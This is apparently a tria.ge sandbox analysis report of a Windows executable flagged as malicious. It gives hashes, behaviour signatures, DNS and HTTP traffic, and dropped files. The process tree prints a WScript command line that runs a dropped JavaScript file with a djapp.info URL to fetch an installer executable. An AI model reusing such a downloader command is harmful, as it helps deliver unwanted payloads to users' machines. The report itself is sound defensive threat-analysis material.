Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

3

95ea46ab8e...18.exe

windows7-x64

8

95ea46ab8e...18.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    04/06/2024, 18:53 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    95ea46ab8eb07da6eac0319ab27699b4

  • SHA1

    308a221a64df731bc53eacb6d6d2780f69003dfb

  • SHA256

    0c7538a10638b146d638d440e86e264ef7b6070efce97f1d07886a43c2078abb

  • SHA512

    331814c2b762931ab6dd2c8cc21259a642cd27926ea10c1d10cfe39141f23db6786a3391fb38ef26b17dba4a9354171c1ea3165e3fa9598b47f6e9cb3d7ccc37

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3f:/7BSH8zUB+nGESaaRvoB7FJNndnO

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2084
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1304.js" http://www.djapp.info/?domain=kObBSMoILw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1304.exe
      2⤵
      • Blocklisted process makes network request
      PID:1336
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1304.js" http://www.djapp.info/?domain=kObBSMoILw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1304.exe
      2⤵
      • Blocklisted process makes network request
      PID:2520
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1304.js" http://www.djapp.info/?domain=kObBSMoILw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1304.exe
      2⤵
      • Blocklisted process makes network request
      PID:2860
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1304.js" http://www.djapp.info/?domain=kObBSMoILw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1304.exe
      2⤵
      • Blocklisted process makes network request
      PID:276
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1304.js" http://www.djapp.info/?domain=kObBSMoILw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1304.exe
      2⤵
      • Blocklisted process makes network request
      PID:1912

Network

  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    DNS
    bi.downthat.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    bi.downthat.com
    IN A
    Response
    bi.downthat.com
    IN CNAME
    traff-5.hugedomains.com
    traff-5.hugedomains.com
    IN CNAME
    hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
    hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
    IN A
    34.205.242.146
    hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
    IN A
    54.161.222.85
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    34.205.242.146:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Tue, 04 Jun 2024 18:53:52 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    DNS
    www.hugedomains.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.hugedomains.com
    IN A
    Response
    www.hugedomains.com
    IN A
    104.26.6.37
    www.hugedomains.com
    IN A
    104.26.7.37
    www.hugedomains.com
    IN A
    172.67.70.191
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 18:53:53 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: site_version_phase=108; expires=Fri, 30-May-2025 18:53:53 GMT; path=/
    set-cookie: site_version=HDv3; expires=Fri, 30-May-2025 18:53:53 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BVEbKm4Pm3brrrm9UXgIom21ZTyQNKibkXIX%2FZaj7Y5ANDZJsmna%2FdNyYG2slESQ9uIl9ciiHIIeSYijg4qgyfMAawOy05xTocQCXXEA19e4ncso4b7NTOR%2BW%2FTMhoGSt27z0BQ%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88ea20d84d179584-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    34.205.242.146:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Tue, 04 Jun 2024 18:53:59 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 18:54:00 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: captcha-tracker=; expires=Mon, 03-Jun-2024 18:54:00 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVgwu3r0Wp5U8c599o5QfOuDa3wIpoR5JU05RjqpYS%2FCSkLnrL7lOFvjSLweTLaR9SBqmr99DUnzMOhfYI8EqY9gDy1FGoVdhXOGHj2K0CE%2Fb1dKyh71Rxtpe8wc%2FFLTwvFpiwE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88ea2101d88693e4-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    34.205.242.146:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Tue, 04 Jun 2024 18:54:05 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 18:54:06 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: captcha-tracker=; expires=Mon, 03-Jun-2024 18:54:06 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WPRMpKMlOsTQs0Q7VazUCXWNSA%2BZHtY9veUY9KuEKo4SiACson6paaFv%2FG1CxUITmu2uyQwA2LsADH2b4qxCqyil06SxKJ3Zai0KQlJcDBb0D8uoEy2DF%2BAd%2BeDUHo4BRr%2FbEgs%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88ea21291aec60fe-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    34.205.242.146:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Tue, 04 Jun 2024 18:54:11 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 18:54:12 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: captcha-tracker=; expires=Mon, 03-Jun-2024 18:54:12 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=01c619wNr5JVegrL8vU6DwcvSaxszZinnshe7My5ffxahx%2FOIgg2YNZNRK8JZu8myAnt39VcIolWFd%2FnDiJiS2lM%2BUt173bh086QAtmmKjBSVuG8Fbv4G2wQKN%2F8PU3eApxGJto%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88ea214ff9032408-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    34.205.242.146:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Tue, 04 Jun 2024 18:54:17 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 18:54:18 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZDo1%2FLu6i4hdaIjs2W2BQWC%2Fzl3yj%2BOXavh3UBT8CbuHo2eIyQlB%2FVIMrUqaIgt3MtdHcFMLhgTzWpkJ6LP5fzcQjeTmvm4RvNj5x7%2BEwa6%2FQccTUtNGfyp3iKX9KjcAjkieM0g%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88ea2176cf486367-LHR
    Content-Encoding: gzip
  • 34.205.242.146:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
     243 B
     5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.4kB
     16.5kB
     15
    22

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 34.205.242.146:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    708 B
     430 B
     6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
     9.2kB
     11
    13

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 34.205.242.146:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
     243 B
     5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
     9.7kB
     11
    14

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 34.205.242.146:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
     243 B
     5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
     9.1kB
     11
    13

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 34.205.242.146:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
     243 B
     5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.4kB
     16.1kB
     14
    19

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    60 B
     139 B
     1
    1

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    bi.downthat.com
    dns
    WScript.exe
    61 B
     191 B
     1
    1

    DNS Request

    bi.downthat.com

    DNS Response

    34.205.242.146
    54.161.222.85

  • 8.8.8.8:53
    www.hugedomains.com
    dns
    WScript.exe
    65 B
     113 B
     1
    1

    DNS Request

    www.hugedomains.com

    DNS Response

    104.26.6.37
    104.26.7.37
    172.67.70.191

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
    Filesize

    1KB

    MD5

    493936daab236ff01eddcad61725cd7b

    SHA1

    77b9225f2e92feae8ab10eff979d7f2986a107a8

    SHA256

    2a626183018a8d4b572c01fe5eb0bcb82d8b36b74694c7cb9ae47735b19ff92b

    SHA512

    d73f9f2f7b223a1a368771c45ed6eb7c02fd5386f6c2594edc94f646094f8aca758c81b1656bf7a1ff72f8e171b8b50bb5a2183d08113705c6fa7a2ae710960f

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
    Filesize

    724B

    MD5

    8202a1cd02e7d69597995cabbe881a12

    SHA1

    8858d9d934b7aa9330ee73de6c476acf19929ff6

    SHA256

    58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

    SHA512

    97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
    Filesize

    410B

    MD5

    cd24833c9eecd6d04408050bc37a34a8

    SHA1

    d867ccdb45df9a05d896779010cd493a35706066

    SHA256

    62ee4eab70c7e4f5364127545402a2fb18b536916749a080accc90c120820de3

    SHA512

    54c48508c346276ad770fa1a3476c929ecd956d011a7fdc3de00424685611941fdfb8f8cf1535abfb569ac353f49737d1f797ce63a41063adca0ea35152a30e3

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    e341cddb8b88404d24a904f93f117f1f

    SHA1

    7a01ae678e75369b84aac8e5c31854a9fb7b4a3d

    SHA256

    113bd85fb7be9f2009cceb0ce2c49b0c55170c9c050b0f86ce068cbaa8a0b451

    SHA512

    e67894e695721432f8a5af5e687d1692426a0ffec7f7e693b2da03ad59619ba1ef331c89cecffe42b9f94ad127edaa44941c5d33b0e4635a41203ac2a2b83e16

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
    Filesize

    392B

    MD5

    c8a37cb9f68b27652a885e92298b01d5

    SHA1

    78047961d08d9818113909e59535f806416bf2ca

    SHA256

    8a48a9c311f1495d28fbd3d7ae44cffd76d096546d1825f4a7b3a267e73c4cbc

    SHA512

    e82ce96b47e24ec757c948ead8baa238688d2929dd117374db603e80b9bb7ac1e52f8d08ad991f66f122942657b1d36b20b3ad24aeb4e63edd1c99a106e4e8ef

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IO0LJX84\domain_profile[1].htm
    Filesize

    40KB

    MD5

    93872aeacb36cbc943a349f49e44b6ea

    SHA1

    27a994618a4664e9eb997f424e86fb0aca7681ec

    SHA256

    b1617e14dcef30f349bde4d875f0e8f246cb6da5ae0eae88f61bcba1a7a2483f

    SHA512

    cf2bd413f67e35b72efe4bd2095b7108a826c81e62bbbfb4486f4d58af00852cd109f0da935ba65c6e0f97f752a8411a69d1cf0b4914e742090609085a747dbd

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IO0LJX84\domain_profile[1].htm
    Filesize

    6KB

    MD5

    2b872cc953ac32e1786620d2476f0171

    SHA1

    5865e7afaae9a3d975b302043357930c391ed418

    SHA256

    1c58dfd1a9264e6275594e1a75f1679e992e775c04d14025ab7d5c97f180be04

    SHA512

    ec814911fe3e569e73ae420e8b2dc1c80eae50a553bdc2d94a55465dbc4594dd68f232b20ee3c763655519c53824aaedf5161251ed43060e632df0c0fdbcaa9b

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SVBQZB4R\domain_profile[1].htm
    Filesize

    6KB

    MD5

    8eaa37246e341e29d1c3bf9562356227

    SHA1

    611439291d378bee6083cb6151f841bed7ba845e

    SHA256

    043390c30382a7f2379d354f94b94a6ecc132c2183bdd663b8bafa2c53248683

    SHA512

    640b36e2161be6faffa52913138343496d13b475616c9754c2ca74e384361ad6a8eed53d72b88e333c592512780edcf211b2069701c60486506ab56fa3870950

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SVBQZB4R\domain_profile[1].htm
    Filesize

    6KB

    MD5

    b4fade3dc06227dc888e8e376866f45d

    SHA1

    daaea5e297cb6e71943887866c8bd200b770417e

    SHA256

    c04d858776ccb2b4581a6d1a6f142aba583a9849ee56b95fc6f4586445589263

    SHA512

    faec2c5fd2178d29c65e9a4f052949f201f110fb7a3623fb724baadedf96ef45719e73aca3f0afefdc79e511b95f4087935fb4028c0e9c3abc0a2e891582b94a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab41F0.tmp
    Filesize

    68KB

    MD5

    29f65ba8e88c063813cc50a4ea544e93

    SHA1

    05a7040d5c127e68c25d81cc51271ffb8bef3568

    SHA256

    1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

    SHA512

    e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar5A70.tmp
    Filesize

    177KB

    MD5

    435a9ac180383f9fa094131b173a2f7b

    SHA1

    76944ea657a9db94f9a4bef38f88c46ed4166983

    SHA256

    67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

    SHA512

    1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\fuf1304.js
    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4BE9MGOJ.txt
    Filesize

    175B

    MD5

    84aed76d54d4c3c26528dc8792f3509e

    SHA1

    249503a0913b1b4db1ff1f58abd951321401bdd1

    SHA256

    344df8c609f293bf12df521b86b8c31b0a985524bf498e8ee71c29ddb53e434c

    SHA512

    f90a4d9840976236b39f5284e57bc52750d88530dc1a14a55219118c267c3b76a9a53cadae12db1fc40dd13a0fa224cc9affe467fd44eb918c69432bcbf6f858

    Download Submit

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.